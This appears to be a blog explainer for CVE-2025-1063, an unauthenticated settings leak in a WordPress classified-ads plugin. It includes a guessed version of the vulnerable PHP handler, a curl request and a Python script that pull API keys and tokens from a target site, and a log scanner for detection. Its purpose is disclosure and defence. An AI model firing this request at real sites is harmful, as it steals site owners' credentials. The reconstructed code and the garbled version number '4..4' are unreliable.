CVE-2025-1063 - Exploiting Sensitive Data Exposure in The Classified Listing – Classified Ads & Business Directory Plugin for WordPress (Up to v4..4)

WordPress powers millions of websites, and plugins bring essential features to site owners. But what happens when a plugin has a vulnerability that leaks sensitive data? That’s the case with CVE-2025-1063, a vulnerability affecting all versions of the "Classified Listing – Classified ads & Business Directory Plugin" up to 4..4. This bug lets attackers—without needing to log in—steal sensitive information like API keys and tokens. Let’s break down how this works, how dangerous it is, and what you should do about it.

What’s the Issue?

The problem is with a PHP function called rtcl_taxonomy_settings_export. This function is meant to export taxonomy settings for the plugin. However, there aren’t enough checks in place. Anyone—yes, even someone who isn’t logged in—can trigger this function and get the exported data, which includes sensitive information.

Official Advisory

- Wordfence Advisory
- CVE-2025-1063 at CVE.org

How Does the Exploit Work?

Attackers can simply send a request to the website targeting the export action, and sensitive data gets delivered right back in the response.

The Core Problem in Code

Here’s a simplified (and safe) version of what the vulnerable code might look like inside the plugin’s file:

```php
// Exposed function in plugin (simplified)
function rtcl_taxonomy_settings_export() {
    // No authentication/authorization checks!
    $settings = get_option('rtcl_taxonomy_settings');
    header('Content-Type: application/json');
    echo json_encode($settings);
    exit;
}
// Hook the function to a public action or AJAX handler
add_action('wp_ajax_nopriv_rtcl_taxonomy_settings_export', 'rtcl_taxonomy_settings_export');
```

Key Takeaway:
*There's no check to see whether the requesting user is authorized or even logged in. Anyone can call this function and get whatever is stored in those settings, including private API keys, tokens, and potentially sensitive business info.*

Attackers could exploit the vulnerability using a simple HTTP request (for example, with curl):

```bash
curl "https://TARGETSITE.com/wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export"
```

If the site is running a vulnerable version of the plugin, this command dumps the plugin's configuration, including sensitive data, right into the terminal.

Here’s a simple Python script that automates the exploit:

```python
import requests

def exploit(url):
    target = f"{url}/wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export"
    response = requests.get(target)
    if response.status_code == 200:
        print("[+] Got data:")
        print(response.text)
    else:
        print("[-] Exploit failed.")

# Example usage
exploit("https://victimsite.com")
```

Check Your Logs:

Look for suspicious access to /wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export.

Reset Secret Keys:

If your data was exposed, change/revoke any leaked API keys or tokens.
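
For the log check above, the following is an added example (not code from the plugin or from the advisories) that scans web server access logs for requests invoking the export action and marks the ones that most likely returned data. It assumes Apache/Nginx Combined Log Format; the sample lines, the `MIN_BODY_BYTES` threshold and the function name are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ACTION = "rtcl_taxonomy_settings_export"  # action name from the advisory text
MIN_BODY_BYTES = 16  # assumption: smaller 200 bodies are not a settings dump

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Feb/2025:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export HTTP/1.1" 200 1843 "-" "curl/8.5.0"
198.51.100.4 - - [26/Feb/2025:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2025:08:30:00 +0000] "GET /wp-admin/admin-ajax.php?action=rtcl%5Ftaxonomy%5Fsettings%5Fexport HTTP/1.1" 400 1 "-" "python-requests/2.31"
198.51.100.4 - - [01/Mar/2025:08:31:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def find_export_requests(lines):
    """Return one record per logged request that invoked the export action."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m["target"])
        if not unquote(parts.path).lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes values, so encoded spellings match too
        if ACTION not in parse_qs(parts.query).get("action", []):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        hits.append({
            "ip": m["ip"], "time": m["time"], "method": m["method"],
            "status": status, "bytes": size,
            # A 200 with a real body means the settings were probably served
            "likely_exposed": status == 200 and size >= MIN_BODY_BYTES,
        })
    return hits

if __name__ == "__main__":
    for hit in find_export_requests(SAMPLE_LOG.splitlines()):
        flag = "ROTATE KEYS" if hit["likely_exposed"] else "review"
        print(f'{hit["time"]} {hit["ip"]} {hit["status"]} {hit["bytes"]}B {flag}')
```

To run it against a real log, pass an open file object to `find_export_requests`; any hit with `likely_exposed` set should be treated as a reason to rotate the keys and tokens stored in the plugin settings.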


Closing Thoughts

Vulnerabilities like CVE-2025-1063 show why it’s vital to update plugins regularly—even ones you trust and have used for years. This bug put thousands of businesses at risk of having their most sensitive data stolen with a single, unauthenticated request. Patch now, audit your sites, and remind your friends and clients: Don’t leave updates for tomorrow!

Stay safe out there!

*Exclusive for StackPostAI – Original, simple breakdown by a security enthusiast focused on helping WordPress users.*

Timeline

Published on: 02/25/2025 07:15:17 UTC
Last modified on: 02/28/2025 16:07:01 UTC